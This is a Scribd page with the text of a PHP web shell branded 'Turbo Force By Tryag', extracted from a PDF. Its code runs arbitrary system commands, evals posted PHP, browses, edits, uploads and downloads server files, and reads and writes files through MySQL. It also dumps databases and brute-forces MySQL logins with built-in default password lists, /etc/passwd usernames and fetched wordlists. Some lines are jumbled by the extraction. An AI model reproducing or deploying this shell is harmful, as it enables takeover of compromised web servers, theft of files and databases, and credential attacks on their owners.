Scribd Logo
Hochladen

Willkommen bei Scribd!

  • Redhot - Copie - PHP PDF

    Hochgeladen von

    PeterAsesino
    184 Ansichten24 Seiten

    Originaltitel

    redhot - Copie.php.pdf

    Copyright

    © © All Rights Reserved

    Verfügbare Formate

    TXT, PDF, TXT oder online auf Scribd lesen

    Stufen Sie dieses Dokument als nützlich ein?

    Sind diese Inhalte unangemessen?

    Dieses Dokument melden

    Copyright:

    © All Rights Reserved
    Als TXT, PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    184 Ansichten24 Seiten

    Redhot - Copie - PHP PDF

    Hochgeladen von

    PeterAsesino

    Copyright:

    © All Rights Reserved
    Als TXT, PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    von 24

    <?

    php
    header('Content-Type: text/html; charset=windows-1256');
    /*
    Turbo Force By Tryag.Cc
    */
    @set_time_limit(0);
    @error_reporting(0);
    if($_POST['page']=='chmod')
    {
    $pathclass=$_POST[pathclass];
    $namefile=$_POST[namefile];
    if(chmod($pathclass,$namefile))
    {
    echo '<center><b> ';
    }else{
    echo '<center><b>';
    }
    exit;
    }
    if($_POST['page']=='file_mysql')
    {
    $connect = mysql_connect('localhost',$_POST['mysql_l'], $_POST['mysql_p']);
    mysql_select_db($_POST['mysql_db'],$connect);
    $query = "CREATE TABLE `ttt` (`wwww` TEXT NOT NULL) ENGINE = MYISAM ;";
    if(mysql_query($query))
    {
    $codes=$_POST[codes];
    $query2 = "INSERT INTO `ttt` (`wwww`)VALUES('$codes');";
    if(mysql_query($query2))
    {
    $pathclass = $_POST['pathclass'];
    if(mysql_query(stripslashes("select * into dumpfile '$pathclass' from ttt")))
    {
    echo " <br>$pathclass";
    $query4 = "DROP TABLE `ttt`";
    mysql_query($query4);
    }else{
    $error = mysql_error();
    echo "<br>$error";
    }
    }else{echo ' ';
    $query4 = "DROP TABLE `ttt`";
    mysql_query($query4);
    }
    }
    $query4 = "DROP TABLE `ttt`";
    mysql_query($query4);
    exit;
    }
    if($_POST['page']=='read_mysql')
    {

    $unique = uniqid('N');
    $file = $_POST['pathclass'];
    $query = array( "CREATE TEMPORARY TABLE $unique (file LONGBLOB)", "LOAD DATA INF
    ILE '".mysql_real_escape_string($file)."' INTO TABLE $unique", "SELECT * FROM $u
    nique" );
    $connect = mysql_connect('localhost',$_POST['mysql_l'], $_POST['mysql_p']);
    mysql_select_db($_POST['mysql_db'],$connect);
    echo '<textarea name="db_query" style="width: 800px; height: 400px;" dir="ltr">'
    ;
    foreach($query as $Allqueries)
    {
    $mysqlQuery = mysql_query($Allqueries,$connect);
    while($line = @mysql_fetch_row($mysqlQuery))
    echo htmlspecialchars($line[0]);
    }
    echo '</textarea>';
    exit;
    }
    if($_POST['page']=='download')
    {
    $namefile=$_POST['namefile'];
    if($_POST['namefile']==null)
    {
    $test1=explode(".",$pathclass);
    if(strpos($test1[0],"\\"))
    {
    $test2=explode("\\\\",$test1[0]);
    }else{
    $test2=explode("/",$test1[0]);
    }
    $st=count($test2);
    $st=$st-1;
    $namefile=$test2[$st].'.'.$test1[1];
    }
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($namefile));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($namefile));
    ob_clean();
    flush();
    readfile($pathclass);
    exit;
    }
    echo '
    <html dir="rtl">
    <head>

    <style type="text/css">
    .style1 {

    font-weight: bold;
    direction: rtl;
    }
    <!-body {
    background-color: #000000;
    font-size: 18px;
    color: #cccccc;
    }
    input,textarea,select{
    font-weight: bold;
    color: #cccccc;
    dashed #ffffff;
    border: 1px
    solid #2C2C2C;
    background-color: #080808
    }
    a {
    background-color: #151515;
    vertical-align: bottom;
    color: #000;
    text-decoration: none;
    font-size: 20px;
    margin: 8px;
    padding: 6px;
    border: thin solid #000;
    }
    a:hover {
    background-color: #080808;
    vertical-align: bottom;
    color: #333;
    text-decoration: none;
    font-size: 20px;
    margin: 8px;
    padding: 6px;
    border: thin solid #000;
    }
    .style1 {
    text-align: center;
    }
    .style2 {
    color: #FFFFFF;
    font-weight: bold;
    }
    .style3 {
    color: #FFFFFF;
    }
    -->
    </style>
    </head>
    ';
    function in($type,$name,$size,$value,$checked=0)
    {
    $ret = "<input type=".$type." name=".$name." "; if($size != 0)
    {
    $ret .= "size=".$size." "; }

    $ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">


    "; }
    class my_sql
    {
    var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $b
    ase = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $c
    olumns; var $num_rows; var $num_fields; var $dump; function connect()
    {
    switch($this->db)
    {
    case 'MySQL': if(empty($this->port))
    {
    $this->port = '3306'; }
    if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_conn
    ect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->
    connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break
    ; case 'MSSQL': if(empty($this->port))
    {
    $this->port = '1433'; }
    if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_conn
    ect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection)
    return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if
    (empty($this->port))
    {
    $this->port = '5432'; }
    $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' pa
    ssword='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_conn
    ect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->co
    nnection)) return 1; $this->error = @pg_last_error($this->connection); break; ca
    se 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @oci
    logon($this->user, $this->pass, $this->base); if(is_resource($this->connection))
    return 1; $error = @ocierror(); $this->error=$error['message']; break; }
    return 0; }
    function select_db()
    {
    switch($this->db)
    {
    case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $th
    is->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_
    select_db($this->base,$this->connection)) return 1; $this->error = "Can't select
    database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1;
    break; }
    return 0; }
    function query($query)
    {
    $this->res=$this->error=''; switch($this->db)
    {
    case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this
    ->connection)))
    {
    $this->error = @mysql_error($this->connection); return 0; }
    else if(is_resource($this->res))
    {
    return 1; }
    return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this
    ->connection)))
    {
    $this->error = 'Query error'; return 0; }
    else if(@mssql_num_rows($this->res) > 0)

    {
    return 1; }
    return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->con
    nection,$query)))
    {
    $this->error = @pg_last_error($this->connection); return 0; }
    else if(@pg_num_rows($this->res) > 0)
    {
    return 1; }
    return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connect
    ion,$query)))
    {
    $this->error = 'Query parse error'; }
    else
    {
    if(@ociexecute($this->res))
    {
    if(@ocirowcount($this->res) != 0) return 2; return 1; }
    $error = @ocierror(); $this->error=$error['message']; }
    break; }
    return 0; }
    function get_result()
    {
    $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=
    0; switch($this->db)
    {
    case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@m
    ysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc
    ($this->res))); @mysql_free_result($this->res); if($this->num_rows)
    {
    $this->columns = @array_keys($this->rows[0]); return 1;}
    break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fi
    elds=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetc
    h_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
    {
    $this->columns = @array_keys($this->rows[0]); return 1;}
    ; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num
    _fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_a
    ssoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
    {
    $this->columns = @array_keys($this->rows[0]); return 1;}
    break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !=
    = ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreesta
    tement($this->res); if($this->num_rows)
    {
    $this->columns = @array_keys($this->rows[0]); return 1;}
    break; }
    return 0; }
    function dump($table)
    {
    if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->
    dump[1] = '## --------------------------------------- '; $this->dump[2] = '## C
    reated: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $t
    his->dump[4] = '##
    Table: '.$table; $this->dump[5] = '## -------------------------------------- '; switch($this->db)
    {
    case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/
    SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return
    0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## -------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * F

    ROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<


    $this->num_rows;$i++)
    {
    foreach($this->rows[$i] as $k=>$v)
    {
    $this->rows[$i][$k] = @mysql_real_escape_string($v);}
    $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).
    '`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
    break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT
    * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$t
    his->num_rows;$i++)
    {
    foreach($this->rows[$i] as $k=>$v)
    {
    $this->rows[$i][$k] = @addslashes($v);}
    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VA
    LUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
    break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->quer
    y('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for(
    $i=0;$i<$this->num_rows;$i++)
    {
    foreach($this->rows[$i] as $k=>$v)
    {
    $this->rows[$i][$k] = @addslashes($v);}
    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VA
    LUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
    break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## un
    der construction'; break; default: return 0; break; }
    return 1; }
    function close()
    {
    switch($this->db)
    {
    case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_clos
    e($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); br
    eak; case 'Oracle': @oci_close($this->connection); break; }
    }
    function affected_rows()
    {
    switch($this->db)
    {
    case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': ret
    urn @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affec
    ted_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); bre
    ak; default: return 0; break; }
    }
    }
    if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['
    d_name']))
    {
    if(!$file=@fopen($_POST['d_name'],"r"))
    {
    err(1,$_POST['d_name']); $_POST['cccc']=""; }
    else
    {
    @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,
    @filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; co
    mpress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding))
    {
    header('Content-Encoding: ' . $content_encoding); }

    header("Content-type: ".$mime_type); header("Content-disposition: attachment; f


    ilename=\"".$filename."\";"); echo $filedump; exit(); }
    }
    if(isset($_GET['phpinfo']))
    {
    echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a
    href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
    if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query")
    {
    echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['
    db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sq
    l->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode
    (';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) ec
    ho "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b
    ></font></div>"; else
    {
    if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=V
    erdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
    {
    foreach($querys as $num=>$query)
    {
    if(strlen($query)>5)
    {
    echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialc
    hars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query))
    {
    case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b
    >".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_re
    sult())
    {
    echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] =
    htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bg
    color=#800000><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><
    td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font
    ></td></tr>"; for($i=0;$i<$sql->num_rows;$i++)
    {
    foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_
    QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&n
    bsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.
    '&nbsp;</font></td></tr>'; }
    echo "</table>"; }
    break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); ech
    o "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar
    ."</b></font></td></tr></table><br>"; break; }
    }
    }
    }
    }
    echo "<br><title>Turbo Force By Tryag</title><form name=form method=POST>";
    echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['d
    b_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','
    mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']);
    echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db
    _query');
    echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input
    type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea
    cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query'])
    :("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit na
    me=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><
    div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].

    ">BACK</a> ]</b></font></div>"; die(); }

    function ccmmdd($ccmmdd2,$att)
    {
    global $ccmmdd2,$att;
    echo '
    <table style="width: 100%" class="style1" dir="rtl">
    <tr>
    <td class="style9"><strong> </strong></td>
    </tr>
    <tr>
    <td class="style13">
    <form method="post">
    <select name="att" dir="rtl" style="heig
    ht: 109px" size="6">
    ';
    if($_POST['att']==null)
    {
    echo '
    <option value="system" selected=
    "">system</option>';
    }else{
    echo "
    <option value='$_POST[att]' sele
    cted=''>$_POST[att]</option>
    <option value=system>system</opt
    ion>
    ";
    }
    echo '
    <option value="passthru">passthr
    u</option>
    <option value="exec">exec</optio
    n>
    <option value="shell_exec">shell
    _exec</option>
    </select>

    <input name="page" value="ccmmdd


    " type="hidden"><br>
    <input dir="ltr" name="ccmmdd2"
    style="width: 173px" type="text" value="';if(!$_POST['ccmmdd2']){echo 'dir';}els
    e{echo $_POST['ccmmdd2'];}echo '"><br>
    <input type="submit" value="">
    </form>
    </td>
    </tr>
    <tr>
    <td class="style13">
    ';
    if($_POST[att]=='system')
    {
    echo '
    <textarea dir="ltr" name="TextArea1" sty
    le="width: 745px; height: 204px">';
    system($_POST['ccmmdd2']);
    </textarea>';

    echo '
    }

    if($_POST[att]=='passthru')
    {
    echo '
    <textarea dir="ltr" name="TextArea1" sty
    le="width: 745px; height: 204px">';
    passthru($_POST['ccmmdd2']);
    </textarea>';

    echo '
    }

    if($_POST[att]=='exec')
    {
    echo '
    le="width: 745px; height: 204px">';

    <textarea dir="ltr" name="TextArea1" sty

    exec($_POST['ccmmdd2'],$res);
    echo $res = join("\n",$res);
    </textarea>';

    echo '
    }

    if($_POST[att]=='shell_exec')
    {

    echo '
    le="width: 745px; height: 204px">';
    echo
    echo '

    <textarea dir="ltr" name="TextArea1" sty


    shell_exec($_POST['ccmmdd2']);
    </textarea>';

    }
    echo '
    </td>
    </tr>
    </table>
    ';
    exit;
    }
    if($_POST['page']=='edit')
    {
    $code=@str_replace("\r\n","\n",$_POST['code']);
    $code=@str_replace('\\','',$code);
    $fp = fopen($pathclass, 'w');
    fwrite($fp,"$code");
    fclose($fp);
    echo "<center><b>OK Edit<br><br><br><br><a href=".$_SERVER['PHP_SELF'].">BACK</a
    >";
    exit;
    }
    if($_POST['page']=='upload')
    {
    if($_FILES['img']['size'] > 0)
    {
    $path=$_POST['pathclass'];
    $name=$_FILES['img']['name'];
    if(strpos($path,"\\"))
    {
    $folder = $path."\\\\".basename($name);
    }else{
    $folder = $path."/".basename($name) ;
    }
    move_uploaded_file($_FILES['img']['tmp_name'],$folder);
    if(strpos($path,"\\"))
    {
    echo '<center><b>Yes<br>'."$path\\\\$name";
    }else{
    echo '<center><b>Yes<br>'."$path/$name";
    }
    }else{
    echo '<center><b>Error :No Enter File';
    }
    exit;
    }

    if($_POST['page']=='showdir')
    {
    $pathclass =$_POST['pathclass'];
    $pathclass = str_replace('\\\\','\\',$pathclass);
    echo '
    <form method="POST">
    <input name="pathclass" type="text" style="width: 284px" value="'.$pathc
    lass.'" dir=ltr><input type="submit" value="">
    <input name="page" type="hidden" value="showdir">
    </form>
    <br>
    ';
    function format_bytes($bytes) {
    if ($bytes < 1024) return $bytes.' B';
    elseif ($bytes < 1048576) return round($bytes / 1024, 2).' KB';
    elseif ($bytes < 1073741824) return round($bytes / 1048576, 2).' MB';
    elseif ($bytes < 1099511627776) return round($bytes / 1073741824, 2).' GB';
    else return round($bytes / 1099511627776, 2).' TB';
    }
    $files1 = scandir($pathclass);
    echo '
    <table border="1" width="100%" dir="ltr">
    <tr>
    <td>
    <p align="center"><b><span lang="en-us">name</span></b></td>
    <td>
    <p align="center"><span lang="en-us"><b>size</b></span></td>
    <td>
    <p align="center"><b><span lang="en-us">chmod</span></b></td>
    <td>
    <p align="center"><b><span lang="en-us">read or edit</span></b><
    /td>
    <td>
    <p align="center"><b><span lang="en-us">dowload</span></b></td>
    </tr>
    ';
    foreach($files1 as $f)
    {
    /*
    echo "$f<br>";
    $f=@filesize($f);
    echo format_bytes($f);
    */
    $fff="$pathclass$f";
    $ff=@filesize($fff);
    echo '
    <tr>
    <td>
    <p align="center">'.$f.'</td>
    <td>
    <p align="center">'.format_bytes($ff).'</td>

    <td>
    <p align="center">
    ';
    if($f=='.'||$f=='..')
    {
    }else{
    echo '
    <form method="POST" target="_blank">
    <p align="center">
    <input name="namefile" type="text" value="777" style="width: 45px;">
    <input type="submit" value="" >
    <input name="pathclass" type="hidden" value="'.$fff.'">
    <input name="page" type="hidden" value="chmod">
    </form>
    ';
    }
    echo '
    </td>
    <td>';
    if($f=='.'||$f=='..')
    {
    //no
    }elseif(strpos($f,".")){
    echo '
    <form method="POST" target="_blank">
    <p align="center">
    <input type="submit" value="">
    <input name="pathclass" type="hidden" value="'.$fff.'">
    <input name="page" type="hidden" value="show">
    </p>
    </form>
    ';
    }
    echo '

    </td>
    <td>
    ';
    if($f=='.'||$f=='..')
    {
    }else{
    echo '
    <form method="POST" target="_blank">
    <p align="center">
    <input type="submit" value="">
    <input name="pathclass" type="hidden" value="'.$fff.'">
    <input name="namefile" type="hidden" value="'.$f.'">
    <input name="page" type="hidden" value="download">
    </form>
    </p>
    ';
    }
    echo'

    </td>

    </tr>
    ';
    }
    echo '</table>';
    exit;
    }

    if($_POST['page']=='code')
    {
    $code=$_POST[code];
    $code=str_replace('\\','',$code);
    eval($code);
    exit;
    }

    if($_POST['page']=='show')
    {
    $pathclass =$_POST['pathclass'];
    echo '
    <form method="POST">
    <input type="hidden" name="page" value="edit">
    ';
    $sahacker = fopen($pathclass, "rb");
    echo '<center>'.$pathclass.'<br><textarea dir="ltr" name="code" style="width: 84
    5px; height: 404px">';
    $code = fread($sahacker, filesize($pathclass));
    echo $code =htmlspecialchars($code);
    echo '</textarea>';
    fclose($sahacker);
    echo '
    <br><input type="text" name="pathclass" value="'.$pathclass.'" style="width: 445
    px;">
    <br><strong><input type="submit" value="edit file">
    </form>
    ';
    exit;
    }

    if($_POST['page']=='ccmmdd')
    {
    echo ccmmdd($ccmmdd2,$att);
    exit;
    }

    if($_POST['page']=='find')
    {
    if(isset($_POST['usernames']) && isset($_POST['passwords']))
    {
    if($_POST['type'] == 'passwd'){
    $e = explode("\n",$_POST['usernames']);
    foreach($e as $value){
    $k = explode(":",$value);
    $username .= $k['0']." ";
    }
    }elseif($_POST['type'] == 'simple'){
    $username = str_replace("\n",' ',$_POST['usernames']);
    }elseif($_POST['type'] == 'file'){
    $username = str_replace("\n",' ',$_POST['usernames']);
    $namefile=$_POST['namefile'];
    $handle1 = fopen($namefile, "r");
    $_POST['passwords'] = fread($handle1, filesize($namefile));
    fclose($handle1);
    }elseif($_POST['type'] == 'url'){
    $username = str_replace("\n",' ',$_POST['usernames']);
    $ch = curl_init($_POST['namefile2']);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

    $_POST['passwords'] = curl_exec($ch);
    /*
    $contextOptions['http'] = array('method' => 'GET', 'max_redirects'=>0, '
    protocol_version'=> 1.0, 'timeout'=>10, 'ignore_errors'=>TRUE);
    $contextResouce = stream_context_create($contextOptions);
    $url = $_POST['namefile2'];
    $handle = fopen("$url", 'r', false, $contextResouce);
    $_POST['passwords'] = stream_get_contents($handle);
    */
    }

    $a1 = explode(" ",$username);


    $a2 = explode("\n",$_POST['passwords']);
    $id2 = count($a2);
    $ok = 0;
    foreach($a1 as $user )
    {
    if($user !== '')
    {
    $user=trim($user);
    for($i=0;$i<=$id2;$i++)
    {
    $pass = trim($a2[$i]);
    $server=$_POST['server'];
    if(@mysql_connect("$server","$user","$pass"))
    {
    echo "<b dir=rtl> (<b><font color=green>$user</
    /b>)<br />";
    $ok++;
    }
    }
    }
    }
    echo "<hr><b> <font color=green>$ok</font> </b>";
    echo "<center><b><a href=".$_SERVER['PHP_SELF']."> </a>";
    exit;
    }
    }
    ?>

    <body style="color: #FFFFFF">

    <form method="POST" target="_blank">


    <strong>
    <input name="page" type="hidden" value="find">
    </strong>
    <table width="600" border="0" cellpadding="3" cellspacing="1" align="center"
    >
    <tr>
    <td valign="top" bgcolor="#151515"><center><strong><img src="http://www.
    upload-big.info/upload/7bbc23e8434e69fef6f87e4c58d387e0.gif" /><br>
    </strong>
    <strong>

    <a href="http://tryag.cc" class="style2"> </


    <span lang="ar-sa"><strong>
    </tr>
    <tr>
    <td>
    <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center
    ">
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
    <strong> :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" r
    ows="10" name="usernames" dir="ltr">root
    admin
    password
    demo
    admin123
    cpanel
    passwd
    user
    pass
    123123
    123456
    1234567
    12345678
    user1
    user2</textarea></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
    <strong> :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" r
    ows="10" name="passwords" dir="ltr">1
    root
    admin
    password
    demo
    admin123
    cpanel
    passwd
    user
    pass
    123123
    123456
    1234567
    12345678
    user1
    user2
    12345
    123456
    1234567
    12345678
    123456789
    1234567890
    121212
    123454321
    123661
    12233456
    0987654321
    aa123456
    a123456
    asa12345

    km217764
    1363834281
    141545512645
    24189248214
    2469182561
    240146385
    23569238592
    23586293561951
    192571025891265981
    1256192856192856106
    156192856
    1856151
    158619865
    1856127561
    182561827561
    aksgawfiaf
    wqfaiuglugraf
    wqruwfuqwrqrq
    afulwurqrqrad
    qwirrqwr
    qwruiyf
    d123456
    12
    123
    1234
    12345
    123456
    1234567
    12345678
    123456789
    1234567890</textarea></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
    <strong> :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
    <strong><input name="server" type="text" value="localhost"></strong></td>
    </tr>

    <tr>
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
    <strong> :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5" class="style1">
    <span class="style2">
    <input type="radio" name="type" value="simple" checked="checked" class="styl
    e1"><b> : <br>
    </b> </span>
    <input type="radio" name="type" value="passwd" class="style1">
    <font class="style2"><b> /etc/passwd<br></b> </fo
    <input type="radio" name="type" value="file" class="style1"><span class=
    "style3">
    <font class="style2"><b> ..
    <input name="namefile" type="text" value="<?php echo realpath('')?>" sty
    le="width: 245px" dir="ltr" ><br>
    <input type="radio" name="type" value="url" class="style1">
    e="text" value="http://www.ethicalhack3r.co.uk/files/fuzzing/rockyou-75.txt" sty
    le="width: 245px" ><br>
    <br>
    http://www.ethicalhack3r.co.uk/files/fuzzing/phpbb.txt<br>
    http://www.ethicalhack3r.co.uk/files/fuzzing/rockyou-75.txt</font></span

    ></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
    <input type="submit" value=" ">
    </strong>
    </td>
    <tr>
    </form>
    <td valign="top" colspan="6">&nbsp;</td>

    <form method="POST" target="_blank">


    <strong>
    <input type="hidden" name="go" value="cmd_mysql">
    </strong>
    <tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"
    dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong></strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"
    dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong> </strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text
    " dir="ltr"></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
    <strong> ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
    <strong>
    <textarea name="db_query" style="width: 353px; height: 89px" dir="ltr">S
    HOW DATABASES;
    SHOW TABLES user_vb ;
    SELECT * FROM user;
    SELECT version();
    SELECT user();</textarea></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
    <input type="submit" value=""></strong></td>
    </tr>
    <input name="db" value="MySQL" type="hidden">
    <input name="db_server" type="hidden" value="localhost">
    <input name="db_port" type="hidden" value="3306">
    <input name="cccc" type="hidden" value="db_query">
    </form>

    <td valign="top" colspan="6">&nbsp;</td>

    <form method="POST" target="_blank">


    <strong>
    </strong>
    <tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong> M
    >
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"
    dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong></strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"
    dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong> </strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text
    " dir="ltr"></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
    <strong> ~</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
    <strong>
    <input name="pathclass" type="text" style="width: 284px" dir="ltr" valu
    e="<?php echo realpath('')?>"></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px">&nbsp;</td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong>
    <input type="submit" value=""></strong></td>
    </tr>
    <input type="hidden" name="page" value="read_mysql">
    </form>

    <td valign="top" colspan="6">&nbsp;</td>


    <form method="POST" target="_blank">
    <strong>
    </strong>

    <tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>
    d>

    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"
    dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong></strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"
    dir="ltr"></strong></td>
    <td valign="top" bgcolor="#151515"><strong> </strong></td>
    <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text
    " dir="ltr"></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="height: 25x; width: 139px;">
    <strong> ~</strong></td>
